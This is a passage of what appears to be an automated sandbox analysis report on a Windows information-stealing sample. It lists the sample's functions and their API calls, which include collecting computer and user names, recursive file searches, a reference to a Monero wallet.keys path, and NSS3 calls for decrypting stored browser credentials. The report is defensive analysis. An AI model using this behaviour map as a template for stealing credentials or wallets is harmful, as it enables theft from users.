Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: e26bf9daa785d2576288e7cadf1d67f731b40a3977ecc64f540d1fc0cdc65e53
Instruction ID: 1f808e926b15582ca5d32ef631b24d2435aa68268bf7c0c7e86d34bb1b7ec18a
Opcode Fuzzy Hash: e26bf9daa785d2576288e7cadf1d67f731b40a3977ecc64f540d1fc0cdc65e53
Instruction Fuzzy Hash: B3F02771681308BBEB149BA4AC49FBFB7ECE706B15F304448FA04E7280D6719F04DAA0

Function 00378D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00361B54,?,?,0038564C,?,?,00380E1F), ref: 00378D9F

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8e4f35a3c888643ec30403451b7d9dca3252bf03f28b18736056eff949b7ea89
Instruction ID: cb86fa89edbd14db924b5fcad3afd694c2f2ac06b549efddc912eab3f36c74a9
Opcode Fuzzy Hash: 8e4f35a3c888643ec30403451b7d9dca3252bf03f28b18736056eff949b7ea89
Instruction Fuzzy Hash: 74F0A570C4020CEBCB25EFA8D5496EDBB74EB11310F108199E86A6B2D1DB785A59DF81

Function 00378DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378E0B

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 3d4c6bf44bbae5f4296d33eb94d20bbb28e383ec4b88361d381125d405448b0f
Instruction ID: 1c50983d3f5c25b6ae859e208fdf8a76ea85027cf9a7c2a2a087c4f993198711
Opcode Fuzzy Hash: 3d4c6bf44bbae5f4296d33eb94d20bbb28e383ec4b88361d381125d405448b0f
Instruction Fuzzy Hash: 26E01A31A4034C6BDBA1EB90CC96FAE737C9B44B01F008295BA0C5A1C0DE74AB868B91

Function 00361190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 003778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377910
Part of subcall function 003778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00377917
Part of subcall function 003778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0037792F

Part of subcall function 00377850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003611B7), ref: 00377880
Part of subcall function 00377850: RtlAllocateHeap.NTDLL(00000000), ref: 00377887
Part of subcall function 00377850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0037789F

ExitProcess.KERNEL32 ref: 003611C6

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 53f336f70b7793dfc8a76ff082757b68baac21c9b812028c1cd3b3bc1d971062
Instruction ID: 9417b66d14f1abc5684e523250dbe60794457b6d0e55d572467eeb7a3c8212a0
Opcode Fuzzy Hash: 53f336f70b7793dfc8a76ff082757b68baac21c9b812028c1cd3b3bc1d971062
Instruction Fuzzy Hash: 4CE012B5D5430163CE6277B0AC0BB2A339C5B2A345F088424FA0DD7502FB2DE804D56B

Non-executed Functions

Function 003738B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 003738CC
FindFirstFileA.KERNEL32(?,?), ref: 003738E3
lstrcat.KERNEL32(?,?), ref: 00373935
StrCmpCA.SHLWAPI(?,00380F70), ref: 00373947
StrCmpCA.SHLWAPI(?,00380F74), ref: 0037395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00373C67
FindClose.KERNEL32(000000FF), ref: 00373C7C

Strings

%s\%s, xrefs: 00373A6F
%s\*, xrefs: 003738C0
%s%s, xrefs: 00373AAD
%s\%s\%s, xrefs: 00373A4A
%s\%s, xrefs: 0037397A

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: c9b0457290be96a237af0d359752e5ff4309394ffd57b54abd4f21f0cd9afe02
Instruction ID: a3f1c34f11701fcf7a8bde061fc1d714747ed88ba8fc66b3cb9cc7c7757462f3
Opcode Fuzzy Hash: c9b0457290be96a237af0d359752e5ff4309394ffd57b54abd4f21f0cd9afe02
Instruction Fuzzy Hash: F2A140B19002199BDB75EBA4DC85FEE7378FF59300F048588E60D96141EB749B88DF62

Function 00374570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00374580
RtlAllocateHeap.NTDLL(00000000), ref: 00374587
wsprintfA.USER32 ref: 003745A6
FindFirstFileA.KERNEL32(?,?), ref: 003745BD
StrCmpCA.SHLWAPI(?,00380FC4), ref: 003745EB
StrCmpCA.SHLWAPI(?,00380FC8), ref: 00374601
FindNextFileA.KERNEL32(000000FF,?), ref: 0037468B
FindClose.KERNEL32(000000FF), ref: 003746A0
lstrcat.KERNEL32(?,0114EA78), ref: 003746C5
lstrcat.KERNEL32(?,0114D640), ref: 003746D8
lstrlen.KERNEL32(?), ref: 003746E5
lstrlen.KERNEL32(?), ref: 003746F6

Strings

%s\*, xrefs: 0037459A
%s\%s, xrefs: 0037461B

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: 336b7af6b55ec47f80f17133bc3650ab38e59092ce22f2fa2431fe397773cd00
Instruction ID: bf186c27ff97d015955aa04dcc4fa251f337b96f25f47215078a651c7e235ab0
Opcode Fuzzy Hash: 336b7af6b55ec47f80f17133bc3650ab38e59092ce22f2fa2431fe397773cd00
Instruction Fuzzy Hash: 4E5189B19402189BC775EB70DC89FEE737CAB59300F408588F60D96050EB789B89DF92

Function 0036ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0036ED3E
FindFirstFileA.KERNEL32(?,?), ref: 0036ED55
StrCmpCA.SHLWAPI(?,00381538), ref: 0036EDAB
StrCmpCA.SHLWAPI(?,0038153C), ref: 0036EDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0036F2AE
FindClose.KERNEL32(000000FF), ref: 0036F2C3

Strings

%s\*.*, xrefs: 0036ED32

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: bbd470310f4f391661bf0f92baa53adbaaa07ee3b99d0629bb147fdeef4e3771
Instruction ID: 35c52e5c8ad7064952f275d4e938360467d7bf81d62e057785a79542dca54024
Opcode Fuzzy Hash: bbd470310f4f391661bf0f92baa53adbaaa07ee3b99d0629bb147fdeef4e3771
Instruction Fuzzy Hash: 06E14671811618AADB66FB60CC91EEE773CAF94300F4081D9B51E66052EF346F8ADF52

Function 0036DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00380C2E), ref: 0036DE5E
StrCmpCA.SHLWAPI(?,003814C8), ref: 0036DEAE
StrCmpCA.SHLWAPI(?,003814CC), ref: 0036DEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0036E3E0
FindClose.KERNEL32(000000FF), ref: 0036E3F2

Strings

\*.*, xrefs: 0036DE26

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 9fb5cbf8e1a8fe24da6a527f5fe20ee8e3d6ad19b85e3ddfa1524acd4e58e8fa
Instruction ID: ce5f10891d5743653799fb21c86a2c76c3b5b7d6d0b5167fb82c3e05db683731
Opcode Fuzzy Hash: 9fb5cbf8e1a8fe24da6a527f5fe20ee8e3d6ad19b85e3ddfa1524acd4e58e8fa
Instruction Fuzzy Hash: A8F1BF71810618AADB37FB60CC95EEE7778AF55300F8081D9A11E66091EF346B4ADF62

Function 0036C820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0036C871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0036C87C
PK11_GetInternalKeySlot.NSS3 ref: 0036C88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0036C8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0036C8EB
